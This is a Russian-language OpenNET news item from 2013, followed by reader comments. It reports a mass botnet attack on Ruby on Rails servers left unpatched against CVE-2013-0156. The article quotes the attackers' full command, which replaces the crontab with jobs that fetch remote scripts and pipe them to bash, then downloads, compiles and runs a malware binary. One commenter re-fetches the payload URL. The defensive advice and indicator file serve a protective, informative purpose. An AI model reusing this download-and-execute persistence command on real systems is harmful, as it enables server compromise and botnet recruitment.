The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

31.05.2013 10:44  Зафиксирована массовая атака на уязвимые версии Ruby on Rails

В Сети зафиксирована массовая атака на сайты, использующие устаревшие выпуски фреймворка Ruby on Rails, содержащие неисправленную уязвимость CVE-2013-0156. Несмотря на то, что обновление Ruby on Rails с исправлением уязвимости было представлено ещё в январе, остаётся достаточно много систем не установивших обновление и остающихся уязвимыми. Этим и воспользовались злоумышленники, намеренные сформировать новый ботнет на базе таких систем.

После эксплуатации уязвимости на сервер устанавливается специальная вредоносная программа, принимающая управляющие команды через IRC (используется канал #rails на сервере cvv4you.ru). В списке процессов вредоносная программа выглядит как "-- bash". Загрузка вредоносного ПО активируется через Cron. После получения доступа к атакованной системе, на ней выполняется следующий код (загрузка и сборка приложения k.c):


crontab -r; echo \\"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены свежие выпуски фреймворка 3.2.13, 3.1.12 или 2.3.18. Проверить активность вредоносного приложения можно по наличию файла /tmp/tan.pid.

  1. Главная ссылка к новости (http://jarmoc.com/blog/2013/05...)
  2. OpenNews: Обновление Ruby on Rails 3.2.12, 3.1.11 и 2.3.17 с устранением критической уязвимости
  3. OpenNews: Обновление Ruby on Rails 3.0.20 и 2.3.16 с устранением критической уязвимости
  4. OpenNews: В Ruby on Rails обнаружена критическая уязвимость, позволяющая выполнить код на сервере
  5. OpenNews: В Ruby on Rails устранена уязвимость, позволяющая осуществить подстановку SQL-кода
  6. OpenNews: Rubygems.org подвергся взлому
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: rubyonrails
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Раскрыть все сообщения | RSS
 
  • 1.1, Анонимусссссс (?), 10:49, 31/05/2013 [ответить] [показать ветку] [···]    [к модератору]
  • +/
    Ай, спасибо, добрый человек.
    *Убежал проверяться.
     
     
  • 2.17, Аноним (-), 15:13, 31/05/2013 [^] [ответить]    [к модератору]
  • +3 +/
    Не читаешь сесуриту рассылку и держишь компилятор на сервере? ай ай ай
     
     
  • 3.19, Аноним (-), 17:17, 31/05/2013 [^] [ответить]    [к модератору]
  • –2 +/
    "сесуриту" ?  А это в куда?
     
  • 3.23, zombardeer (?), 21:19, 31/05/2013 [^] [ответить]    [к модератору]
  • –1 +/
    отсутствие компилятора на сервере... как элемент защиты. виндовсятник?
     
     
  • 4.27, Куяврик (?), 14:47, 01/06/2013 [^] [ответить]    [к модератору]
  • +/
    > отсутствие компилятора на сервере... как элемент защиты. виндовсятник?

    скорее убунтоид, если разница кого-то волнует

     
  • 1.2, Аноним (-), 11:11, 31/05/2013 [ответить] [показать ветку] [···]    [к модератору]  
  • –11 +/
    под_linux_нету_вирусов.jpg
     
     
  • 2.3, scorry (ok), 11:18, 31/05/2013 [^] [ответить]    [к модератору]  
  • +4 +/
    Ещё один из разряда «прочитал всё, не понял ни одной буквы».
     
     
  • 3.5, ВовкаОсиист (ok), 11:42, 31/05/2013 [^] [ответить]    [к модератору]  
  • +3 +/
    Да тут врятли дальше заголовка пошло дело.
     
  • 2.10, Аноним (-), 13:12, 31/05/2013 [^] [ответить]    [к модератору]  
  • +/
    Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD и правда нету.
     
     
  • 3.21, XoRe (ok), 18:06, 31/05/2013 [^] [ответить]    [к модератору]  
  • +/
    > Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD
    > и правда нету.

    Вообще есть)
    Но они очень редки, в пересчете на количество пользователей/серверов.
    И чаще это руткиты.

     
  • 2.24, Аноним (-), 09:49, 01/06/2013 [^] [ответить]     [к модератору]  
  • +/
    Определение вируса заодним и других зловредов хоть в Википедии прочитай и зауч... весь текст скрыт [показать]
     
  • 1.4, тигар (ok), 11:22, 31/05/2013 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    они поломали хетзнир?

    --2013-05-31 10:21:32--  http://88.198.20.247/k.c
    Connecting to 88.198.20.247:80... connected.
    HTTP request sent, awaiting response...
    и тишина...

     
     
  • 2.8, xdsl (?), 12:55, 31/05/2013 [^] [ответить]    [к модератору]  
  • +/
    У тебя неправильный юзерагент
     
     
  • 3.9, тигар (ok), 12:59, 31/05/2013 [^] [ответить]    [к модератору]  
  • –1 +/
    > У тебя неправильный юзерагент

    что-то я не заметил в том cronjob левого UA

     
     
  • 4.12, Аноним (-), 13:31, 31/05/2013 [^] [ответить]    [к модератору]  
  • +/
    User-Agent: Wget/1.13.4 (linux-gnu)
     
     
  • 5.14, тигар (ok), 14:01, 31/05/2013 [^] [ответить]    [к модератору]  
  • –1 +/
    [tiger@laptop]:~%wget --user-agent="Wget/1.13.4 (linux-gnu)" http://88.198.20.247/k.c
    --2013-05-31 13:00:31--  http://88.198.20.247/k.c
    HTTP request sent, awaiting response... 504 Gateway Time-out
    2013-05-31 13:03:31 ERROR 504: Gateway Time-out.
     
     
  • 6.16, Аноним (-), 15:02, 31/05/2013 [^] [ответить]    [к модератору]  
  • +/
    уже прикрыли хосты и айпи
     
  • 3.13, Аноним (-), 13:52, 31/05/2013 [^] [ответить]    [к модератору]  
  • +/
    ТолстОта
     
  • 1.6, ано2анон (?), 12:42, 31/05/2013 [ответить] [показать ветку] [···]    [к модератору]  
  • –2 +/
    Что то по тенденции руби напоминает друшлак :D
     
     
  • 2.11, Аноним (-), 13:18, 31/05/2013 [^] [ответить]    [к модератору]  
  • +6 +/
    Как и всё, что админы поставили и оставили без внимания на длительное время.
     
     
  • 3.25, Аноним (-), 09:51, 01/06/2013 [^] [ответить]    [к модератору]  
  • +/
    > Как и всё, что админы поставили и оставили без внимания на длительное
    > время.

    А если админа контрора берет только для внедрения, а потом фактически засылает его?

     
  • 2.18, GentooBoy (ok), 16:07, 31/05/2013 [^] [ответить]    [к модератору]  
  • +2 +/
    причем тут руби? говориться про рельсы
    http://www.cvedetails.com/vulnerability-list/vendor_id-10199/product_id-18211
     
     
  • 3.20, robux (ok), 17:34, 31/05/2013 [^] [ответить]    [к модератору]  
  • +/
    Он не знает что такое руби.
    Да похоже и рельсы не знает что такое.
     
  • 1.7, Аноним (-), 12:50, 31/05/2013 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    >Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены

    gcc

     
     
  • 2.26, Аноним (-), 09:53, 01/06/2013 [^] [ответить]     [к модератору]  
  • +/
    Прикинь, если выставленные наружу виндовые сервера нам пытались такую технологи... весь текст скрыт [показать]
     
  • 1.28, бедный буратино (ok), 16:58, 01/06/2013 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    https://jira.mongodb.org/browse/PYTHON-532
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor